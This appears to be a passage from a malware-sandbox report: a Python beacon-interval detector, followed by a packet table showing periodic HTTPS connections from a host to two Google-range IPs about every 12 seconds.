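The alert above fires inside the first of a series of TLS connections that the packet table below records, and the interesting property of that series is its timing rather than any single packet. The following added example (not Joe Sandbox code) takes the first packet of each client connection, constructed here as tab-separated rows copied from that table (plus one server-side packet to show direction filtering), and measures the gap between new connections to each server address. The one-second jitter tolerance and the three-connection minimum are this example's own choices.

```python
"""Beacon-interval check over the TCP connections in the packet table.
Added example; not Joe Sandbox code."""
from collections import defaultdict
from datetime import datetime
from statistics import mean

# Constructed from the table below: timestamp, src port, dst port, src IP, dst IP.
PACKETS = """\
Jan 11, 2025 05:13:08.257000923 CET\t49736\t443\t192.168.2.4\t142.250.184.206
Jan 11, 2025 05:13:08.257042885 CET\t443\t49736\t142.250.184.206\t192.168.2.4
Jan 11, 2025 05:13:09.559186935 CET\t49737\t443\t192.168.2.4\t172.217.16.193
Jan 11, 2025 05:13:20.664839983 CET\t49738\t443\t192.168.2.4\t142.250.184.206
Jan 11, 2025 05:13:21.692074060 CET\t49739\t443\t192.168.2.4\t172.217.16.193
Jan 11, 2025 05:13:32.772690058 CET\t49740\t443\t192.168.2.4\t142.250.184.206
Jan 11, 2025 05:13:33.912990093 CET\t49741\t443\t192.168.2.4\t172.217.16.193
Jan 11, 2025 05:13:44.976455927 CET\t49805\t443\t192.168.2.4\t142.250.184.206
"""


def parse_ts(text: str) -> datetime:
    """'Jan 11, 2025 05:13:08.257000923 CET' -> datetime.
    Nanoseconds are truncated to microseconds; the zone suffix is dropped (all rows share it)."""
    body, _zone = text.rsplit(" ", 1)
    head, frac = body.rsplit(".", 1)
    return datetime.strptime(f"{head}.{frac[:6]}", "%b %d, %Y %H:%M:%S.%f")


def parse_packets(text: str):
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, sport, dport, sip, dip = line.split("\t")
        rows.append((parse_ts(ts), int(sport), int(dport), sip, dip))
    return rows


def flow_starts(rows, server_port: int = 443) -> dict:
    """Earliest packet of each client->server flow, keyed by (client IP, client port, server IP)."""
    starts = {}
    for ts, sport, dport, sip, dip in rows:
        if dport != server_port:
            continue  # server->client direction, or a different service
        key = (sip, sport, dip)
        if key not in starts or ts < starts[key]:
            starts[key] = ts
    return starts


def connection_gaps(starts: dict) -> dict:
    """Seconds between successive new connections to each server IP."""
    per_dst = defaultdict(list)
    for (_sip, _sport, dip), ts in starts.items():
        per_dst[dip].append(ts)
    gaps = {}
    for dip, times in per_dst.items():
        times.sort()
        gaps[dip] = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
    return gaps


def periodic_destinations(starts: dict, min_connections: int = 3, jitter_seconds: float = 1.0) -> dict:
    """Server IPs contacted at a near-constant interval -> mean interval in seconds."""
    found = {}
    for dip, gaps in connection_gaps(starts).items():
        if not gaps or len(gaps) + 1 < min_connections:
            continue
        if max(gaps) - min(gaps) <= jitter_seconds:
            found[dip] = round(mean(gaps), 1)
    return found


if __name__ == "__main__":
    starts = flow_starts(parse_packets(PACKETS))
    for dip, interval in periodic_destinations(starts).items():
        print(f"{dip}: new connection every ~{interval}s")
```

Both server addresses are contacted on a cycle of roughly 12 seconds with well under a second of drift, which is the shape of a retry or polling loop rather than of user-driven browsing. The same grouping works on firewall or Zeek conn logs once the timestamp parser is swapped; grouping by server IP and client port (rather than by 4-tuple alone) is what exposes the rhythm when every connection uses a fresh ephemeral port, as here.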
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 11, 2025 05:13:08.257000923 CET | 49736 | 443 | 192.168.2.4 | 142.250.184.206
Jan 11, 2025 05:13:08.257042885 CET | 443 | 49736 | 142.250.184.206 | 192.168.2.4
Jan 11, 2025 05:13:08.257121086 CET | 49736 | 443 | 192.168.2.4 | 142.250.184.206
Jan 11, 2025 05:13:08.272598028 CET | 49736 | 443 | 192.168.2.4 | 142.250.184.206
Jan 11, 2025 05:13:08.272630930 CET | 443 | 49736 | 142.250.184.206 | 192.168.2.4
Jan 11, 2025 05:13:08.924170017 CET | 443 | 49736 | 142.250.184.206 | 192.168.2.4
Jan 11, 2025 05:13:08.924292088 CET | 49736 | 443 | 192.168.2.4 | 142.250.184.206
Jan 11, 2025 05:13:08.924958944 CET | 443 | 49736 | 142.250.184.206 | 192.168.2.4
Jan 11, 2025 05:13:08.925093889 CET | 49736 | 443 | 192.168.2.4 | 142.250.184.206
Jan 11, 2025 05:13:09.225027084 CET | 49736 | 443 | 192.168.2.4 | 142.250.184.206
Jan 11, 2025 05:13:09.225048065 CET | 443 | 49736 | 142.250.184.206 | 192.168.2.4
Jan 11, 2025 05:13:09.225431919 CET | 443 | 49736 | 142.250.184.206 | 192.168.2.4
Jan 11, 2025 05:13:09.225709915 CET | 49736 | 443 | 192.168.2.4 | 142.250.184.206
Jan 11, 2025 05:13:09.236819983 CET | 49736 | 443 | 192.168.2.4 | 142.250.184.206
Jan 11, 2025 05:13:09.283324957 CET | 443 | 49736 | 142.250.184.206 | 192.168.2.4
Jan 11, 2025 05:13:09.535450935 CET | 443 | 49736 | 142.250.184.206 | 192.168.2.4
Jan 11, 2025 05:13:09.535510063 CET | 49736 | 443 | 192.168.2.4 | 142.250.184.206
Jan 11, 2025 05:13:09.535531998 CET | 443 | 49736 | 142.250.184.206 | 192.168.2.4
Jan 11, 2025 05:13:09.535734892 CET | 49736 | 443 | 192.168.2.4 | 142.250.184.206
Jan 11, 2025 05:13:09.535734892 CET | 49736 | 443 | 192.168.2.4 | 142.250.184.206
Jan 11, 2025 05:13:09.535768986 CET | 443 | 49736 | 142.250.184.206 | 192.168.2.4
Jan 11, 2025 05:13:09.535911083 CET | 443 | 49736 | 142.250.184.206 | 192.168.2.4
Jan 11, 2025 05:13:09.535917997 CET | 49736 | 443 | 192.168.2.4 | 142.250.184.206
Jan 11, 2025 05:13:09.536170006 CET | 49736 | 443 | 192.168.2.4 | 142.250.184.206
Jan 11, 2025 05:13:09.559186935 CET | 49737 | 443 | 192.168.2.4 | 172.217.16.193
Jan 11, 2025 05:13:09.559227943 CET | 443 | 49737 | 172.217.16.193 | 192.168.2.4
Jan 11, 2025 05:13:09.559297085 CET | 49737 | 443 | 192.168.2.4 | 172.217.16.193
Jan 11, 2025 05:13:09.559590101 CET | 49737 | 443 | 192.168.2.4 | 172.217.16.193
Jan 11, 2025 05:13:09.559600115 CET | 443 | 49737 | 172.217.16.193 | 192.168.2.4
Jan 11, 2025 05:13:10.212208986 CET | 443 | 49737 | 172.217.16.193 | 192.168.2.4
Jan 11, 2025 05:13:10.212301016 CET | 49737 | 443 | 192.168.2.4 | 172.217.16.193
Jan 11, 2025 05:13:10.216110945 CET | 49737 | 443 | 192.168.2.4 | 172.217.16.193
Jan 11, 2025 05:13:10.216131926 CET | 443 | 49737 | 172.217.16.193 | 192.168.2.4
Jan 11, 2025 05:13:10.216382027 CET | 443 | 49737 | 172.217.16.193 | 192.168.2.4
Jan 11, 2025 05:13:10.219861031 CET | 49737 | 443 | 192.168.2.4 | 172.217.16.193
Jan 11, 2025 05:13:10.220212936 CET | 49737 | 443 | 192.168.2.4 | 172.217.16.193
Jan 11, 2025 05:13:10.263344049 CET | 443 | 49737 | 172.217.16.193 | 192.168.2.4
Jan 11, 2025 05:13:10.638128996 CET | 443 | 49737 | 172.217.16.193 | 192.168.2.4
Jan 11, 2025 05:13:10.638200998 CET | 443 | 49737 | 172.217.16.193 | 192.168.2.4
Jan 11, 2025 05:13:10.638269901 CET | 443 | 49737 | 172.217.16.193 | 192.168.2.4
Jan 11, 2025 05:13:10.638366938 CET | 49737 | 443 | 192.168.2.4 | 172.217.16.193
Jan 11, 2025 05:13:10.638366938 CET | 49737 | 443 | 192.168.2.4 | 172.217.16.193
Jan 11, 2025 05:13:10.644879103 CET | 49737 | 443 | 192.168.2.4 | 172.217.16.193
Jan 11, 2025 05:13:10.644906998 CET | 443 | 49737 | 172.217.16.193 | 192.168.2.4
Jan 11, 2025 05:13:20.664839983 CET | 49738 | 443 | 192.168.2.4 | 142.250.184.206
Jan 11, 2025 05:13:20.664882898 CET | 443 | 49738 | 142.250.184.206 | 192.168.2.4
Jan 11, 2025 05:13:20.664946079 CET | 49738 | 443 | 192.168.2.4 | 142.250.184.206
Jan 11, 2025 05:13:20.665188074 CET | 49738 | 443 | 192.168.2.4 | 142.250.184.206
Jan 11, 2025 05:13:20.665205002 CET | 443 | 49738 | 142.250.184.206 | 192.168.2.4
Jan 11, 2025 05:13:21.300605059 CET | 443 | 49738 | 142.250.184.206 | 192.168.2.4
Jan 11, 2025 05:13:21.300694942 CET | 49738 | 443 | 192.168.2.4 | 142.250.184.206
Jan 11, 2025 05:13:21.301402092 CET | 443 | 49738 | 142.250.184.206 | 192.168.2.4
Jan 11, 2025 05:13:21.301464081 CET | 49738 | 443 | 192.168.2.4 | 142.250.184.206
Jan 11, 2025 05:13:21.303195000 CET | 49738 | 443 | 192.168.2.4 | 142.250.184.206
Jan 11, 2025 05:13:21.303204060 CET | 443 | 49738 | 142.250.184.206 | 192.168.2.4
Jan 11, 2025 05:13:21.303468943 CET | 443 | 49738 | 142.250.184.206 | 192.168.2.4
Jan 11, 2025 05:13:21.303523064 CET | 49738 | 443 | 192.168.2.4 | 142.250.184.206
Jan 11, 2025 05:13:21.303930998 CET | 49738 | 443 | 192.168.2.4 | 142.250.184.206
Jan 11, 2025 05:13:21.347372055 CET | 443 | 49738 | 142.250.184.206 | 192.168.2.4
Jan 11, 2025 05:13:21.680197001 CET | 443 | 49738 | 142.250.184.206 | 192.168.2.4
Jan 11, 2025 05:13:21.680409908 CET | 49738 | 443 | 192.168.2.4 | 142.250.184.206
Jan 11, 2025 05:13:21.680422068 CET | 443 | 49738 | 142.250.184.206 | 192.168.2.4
Jan 11, 2025 05:13:21.680478096 CET | 49738 | 443 | 192.168.2.4 | 142.250.184.206
Jan 11, 2025 05:13:21.680541992 CET | 49738 | 443 | 192.168.2.4 | 142.250.184.206
Jan 11, 2025 05:13:21.680583000 CET | 443 | 49738 | 142.250.184.206 | 192.168.2.4
Jan 11, 2025 05:13:21.680636883 CET | 49738 | 443 | 192.168.2.4 | 142.250.184.206
Jan 11, 2025 05:13:21.692074060 CET | 49739 | 443 | 192.168.2.4 | 172.217.16.193
Jan 11, 2025 05:13:21.692123890 CET | 443 | 49739 | 172.217.16.193 | 192.168.2.4
Jan 11, 2025 05:13:21.692208052 CET | 49739 | 443 | 192.168.2.4 | 172.217.16.193
Jan 11, 2025 05:13:21.692485094 CET | 49739 | 443 | 192.168.2.4 | 172.217.16.193
Jan 11, 2025 05:13:21.692501068 CET | 443 | 49739 | 172.217.16.193 | 192.168.2.4
Jan 11, 2025 05:13:22.343306065 CET | 443 | 49739 | 172.217.16.193 | 192.168.2.4
Jan 11, 2025 05:13:22.343411922 CET | 49739 | 443 | 192.168.2.4 | 172.217.16.193
Jan 11, 2025 05:13:22.344012022 CET | 49739 | 443 | 192.168.2.4 | 172.217.16.193
Jan 11, 2025 05:13:22.344024897 CET | 443 | 49739 | 172.217.16.193 | 192.168.2.4
Jan 11, 2025 05:13:22.344279051 CET | 49739 | 443 | 192.168.2.4 | 172.217.16.193
Jan 11, 2025 05:13:22.344285965 CET | 443 | 49739 | 172.217.16.193 | 192.168.2.4
Jan 11, 2025 05:13:22.759047031 CET | 443 | 49739 | 172.217.16.193 | 192.168.2.4
Jan 11, 2025 05:13:22.759114027 CET | 443 | 49739 | 172.217.16.193 | 192.168.2.4
Jan 11, 2025 05:13:22.759179115 CET | 443 | 49739 | 172.217.16.193 | 192.168.2.4
Jan 11, 2025 05:13:22.759181976 CET | 49739 | 443 | 192.168.2.4 | 172.217.16.193
Jan 11, 2025 05:13:22.759219885 CET | 49739 | 443 | 192.168.2.4 | 172.217.16.193
Jan 11, 2025 05:13:22.759243965 CET | 49739 | 443 | 192.168.2.4 | 172.217.16.193
Jan 11, 2025 05:13:22.759860992 CET | 49739 | 443 | 192.168.2.4 | 172.217.16.193
Jan 11, 2025 05:13:22.759881020 CET | 443 | 49739 | 172.217.16.193 | 192.168.2.4
Jan 11, 2025 05:13:32.772690058 CET | 49740 | 443 | 192.168.2.4 | 142.250.184.206
Jan 11, 2025 05:13:32.772743940 CET | 443 | 49740 | 142.250.184.206 | 192.168.2.4
Jan 11, 2025 05:13:32.772820950 CET | 49740 | 443 | 192.168.2.4 | 142.250.184.206
Jan 11, 2025 05:13:32.773215055 CET | 49740 | 443 | 192.168.2.4 | 142.250.184.206
Jan 11, 2025 05:13:32.773228884 CET | 443 | 49740 | 142.250.184.206 | 192.168.2.4
Jan 11, 2025 05:13:33.416091919 CET | 443 | 49740 | 142.250.184.206 | 192.168.2.4
Jan 11, 2025 05:13:33.416258097 CET | 49740 | 443 | 192.168.2.4 | 142.250.184.206
Jan 11, 2025 05:13:33.418809891 CET | 443 | 49740 | 142.250.184.206 | 192.168.2.4
Jan 11, 2025 05:13:33.418890953 CET | 49740 | 443 | 192.168.2.4 | 142.250.184.206
Jan 11, 2025 05:13:33.423162937 CET | 49740 | 443 | 192.168.2.4 | 142.250.184.206
Jan 11, 2025 05:13:33.423177004 CET | 443 | 49740 | 142.250.184.206 | 192.168.2.4
Jan 11, 2025 05:13:33.423521996 CET | 443 | 49740 | 142.250.184.206 | 192.168.2.4
Jan 11, 2025 05:13:33.423628092 CET | 49740 | 443 | 192.168.2.4 | 142.250.184.206
Jan 11, 2025 05:13:33.423942089 CET | 49740 | 443 | 192.168.2.4 | 142.250.184.206
Jan 11, 2025 05:13:33.467330933 CET | 443 | 49740 | 142.250.184.206 | 192.168.2.4
Jan 11, 2025 05:13:33.903237104 CET | 443 | 49740 | 142.250.184.206 | 192.168.2.4
Jan 11, 2025 05:13:33.903361082 CET | 49740 | 443 | 192.168.2.4 | 142.250.184.206
Jan 11, 2025 05:13:33.903382063 CET | 443 | 49740 | 142.250.184.206 | 192.168.2.4
Jan 11, 2025 05:13:33.903422117 CET | 49740 | 443 | 192.168.2.4 | 142.250.184.206
Jan 11, 2025 05:13:33.903527021 CET | 49740 | 443 | 192.168.2.4 | 142.250.184.206
Jan 11, 2025 05:13:33.903752089 CET | 443 | 49740 | 142.250.184.206 | 192.168.2.4
Jan 11, 2025 05:13:33.903816938 CET | 49740 | 443 | 192.168.2.4 | 142.250.184.206
Jan 11, 2025 05:13:33.912990093 CET | 49741 | 443 | 192.168.2.4 | 172.217.16.193
Jan 11, 2025 05:13:33.913026094 CET | 443 | 49741 | 172.217.16.193 | 192.168.2.4
Jan 11, 2025 05:13:33.913094044 CET | 49741 | 443 | 192.168.2.4 | 172.217.16.193
Jan 11, 2025 05:13:33.913336039 CET | 49741 | 443 | 192.168.2.4 | 172.217.16.193
Jan 11, 2025 05:13:33.913355112 CET | 443 | 49741 | 172.217.16.193 | 192.168.2.4
Jan 11, 2025 05:13:34.546443939 CET | 443 | 49741 | 172.217.16.193 | 192.168.2.4
Jan 11, 2025 05:13:34.546531916 CET | 49741 | 443 | 192.168.2.4 | 172.217.16.193
Jan 11, 2025 05:13:34.547009945 CET | 49741 | 443 | 192.168.2.4 | 172.217.16.193
Jan 11, 2025 05:13:34.547017097 CET | 443 | 49741 | 172.217.16.193 | 192.168.2.4
Jan 11, 2025 05:13:34.547247887 CET | 49741 | 443 | 192.168.2.4 | 172.217.16.193
Jan 11, 2025 05:13:34.547252893 CET | 443 | 49741 | 172.217.16.193 | 192.168.2.4
Jan 11, 2025 05:13:34.963939905 CET | 443 | 49741 | 172.217.16.193 | 192.168.2.4
Jan 11, 2025 05:13:34.964010954 CET | 443 | 49741 | 172.217.16.193 | 192.168.2.4
Jan 11, 2025 05:13:34.964015007 CET | 49741 | 443 | 192.168.2.4 | 172.217.16.193
Jan 11, 2025 05:13:34.964031935 CET | 443 | 49741 | 172.217.16.193 | 192.168.2.4
Jan 11, 2025 05:13:34.964055061 CET | 49741 | 443 | 192.168.2.4 | 172.217.16.193
Jan 11, 2025 05:13:34.964077950 CET | 49741 | 443 | 192.168.2.4 | 172.217.16.193
Jan 11, 2025 05:13:34.964082956 CET | 443 | 49741 | 172.217.16.193 | 192.168.2.4
Jan 11, 2025 05:13:34.964124918 CET | 49741 | 443 | 192.168.2.4 | 172.217.16.193
Jan 11, 2025 05:13:34.964668989 CET | 49741 | 443 | 192.168.2.4 | 172.217.16.193
Jan 11, 2025 05:13:34.964684010 CET | 443 | 49741 | 172.217.16.193 | 192.168.2.4
Jan 11, 2025 05:13:44.976455927 CET | 49805 | 443 | 192.168.2.4 | 142.250.184.206
Jan 11, 2025 05:13:44.976497889 CET | 443 | 49805 | 142.250.184.206 | 192.168.2.4
                                                        Jan 11, 2025 05:13:44.978017092 CET49805443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:13:44.978187084 CET49805443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:13:44.978200912 CET44349805142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:13:45.635907888 CET44349805142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:13:45.636693954 CET44349805142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:13:45.636753082 CET49805443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:13:45.636753082 CET49805443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:13:45.636775017 CET44349805142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:13:45.638657093 CET49805443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:13:45.638657093 CET49805443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:13:45.638664961 CET44349805142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:13:45.638956070 CET44349805142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:13:45.639343977 CET49805443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:13:45.639343977 CET49805443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:13:45.683321953 CET44349805142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:13:46.024167061 CET44349805142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:13:46.024235964 CET49805443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:13:46.024245977 CET44349805142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:13:46.024281979 CET49805443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:13:46.024419069 CET49805443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:13:46.024456024 CET44349805142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:13:46.024496078 CET49805443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:13:46.031303883 CET49812443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:13:46.031344891 CET44349812172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:13:46.031409025 CET49812443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:13:46.031600952 CET49812443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:13:46.031611919 CET44349812172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:13:46.703594923 CET44349812172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:13:46.703764915 CET49812443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:13:46.704233885 CET49812443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:13:46.704263926 CET44349812172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:13:46.704427004 CET49812443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:13:46.704441071 CET44349812172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:13:47.121601105 CET44349812172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:13:47.121701002 CET49812443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:13:47.121769905 CET44349812172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:13:47.121809006 CET44349812172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:13:47.121829987 CET49812443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:13:47.121850014 CET44349812172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:13:47.121881962 CET49812443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:13:47.121922016 CET49812443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:13:47.121932983 CET44349812172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:13:47.121980906 CET49812443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:13:47.121995926 CET44349812172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:13:47.122049093 CET49812443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:13:47.122658014 CET49812443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:13:47.122694016 CET44349812172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:13:57.158864975 CET49886443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:13:57.158885002 CET44349886142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:13:57.158951044 CET49886443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:13:57.180697918 CET49886443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:13:57.180715084 CET44349886142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:13:57.898602009 CET44349886142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:13:57.898727894 CET49886443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:13:57.899703979 CET44349886142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:13:57.899780989 CET49886443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:13:57.901293993 CET49886443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:13:57.901302099 CET44349886142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:13:57.901629925 CET44349886142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:13:57.901684046 CET49886443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:13:57.902039051 CET49886443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:13:57.943331003 CET44349886142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:13:58.282979012 CET44349886142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:13:58.283070087 CET49886443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:13:58.283133984 CET44349886142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:13:58.283210993 CET49886443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:13:58.283323050 CET49886443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:13:58.283404112 CET44349886142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:13:58.283473015 CET49886443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:13:58.299140930 CET49894443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:13:58.299170017 CET44349894172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:13:58.299235106 CET49894443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:13:58.299627066 CET49894443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:13:58.299639940 CET44349894172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:13:58.960295916 CET44349894172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:13:58.960370064 CET49894443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:13:58.960746050 CET49894443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:13:58.960752010 CET44349894172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:13:58.960943937 CET49894443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:13:58.960948944 CET44349894172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:13:59.414283037 CET44349894172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:13:59.414354086 CET49894443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:13:59.414362907 CET44349894172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:13:59.414376020 CET44349894172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:13:59.414411068 CET49894443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:13:59.414417982 CET44349894172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:13:59.414431095 CET49894443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:13:59.414453983 CET44349894172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:13:59.414462090 CET49894443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:13:59.414504051 CET49894443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:13:59.415013075 CET49894443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:13:59.415020943 CET44349894172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:14:09.429573059 CET49968443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:14:09.429608107 CET44349968142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:14:09.429676056 CET49968443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:14:09.429929018 CET49968443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:14:09.429944038 CET44349968142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:14:10.077197075 CET44349968142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:14:10.077363014 CET49968443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:14:10.080077887 CET44349968142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:14:10.080147028 CET49968443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:14:10.081974030 CET49968443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:14:10.081983089 CET44349968142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:14:10.082365990 CET44349968142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:14:10.082427025 CET49968443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:14:10.082861900 CET49968443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:14:10.123322010 CET44349968142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:14:10.456926107 CET44349968142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:14:10.456998110 CET49968443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:14:10.457012892 CET44349968142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:14:10.457093000 CET49968443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:14:10.457187891 CET49968443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:14:10.457235098 CET44349968142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:14:10.457397938 CET44349968142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:14:10.457401037 CET49968443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:14:10.457448959 CET49968443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:14:10.473184109 CET49975443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:14:10.473229885 CET44349975172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:14:10.473300934 CET49975443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:14:10.473592043 CET49975443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:14:10.473611116 CET44349975172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:14:11.101465940 CET44349975172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:14:11.101916075 CET49975443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:14:11.102277040 CET49975443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:14:11.102286100 CET44349975172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:14:11.102540970 CET49975443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:14:11.102547884 CET44349975172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:14:11.524039030 CET44349975172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:14:11.524127960 CET44349975172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:14:11.524202108 CET44349975172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:14:11.524347067 CET49975443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:14:11.527869940 CET49975443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:14:11.527869940 CET49975443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:14:11.527898073 CET49975443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:14:21.538546085 CET50014443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:14:21.538609982 CET44350014142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:14:21.538724899 CET50014443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:14:21.539169073 CET50014443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:14:21.539184093 CET44350014142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:14:22.170948982 CET44350014142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:14:22.171180010 CET50014443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:14:22.171745062 CET44350014142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:14:22.171813965 CET50014443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:14:22.173774004 CET50014443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:14:22.173796892 CET44350014142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:14:22.174061060 CET44350014142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:14:22.174113989 CET50014443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:14:22.174572945 CET50014443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:14:22.215344906 CET44350014142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:14:22.559890985 CET44350014142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:14:22.560069084 CET50014443192.168.2.4142.250.184.206
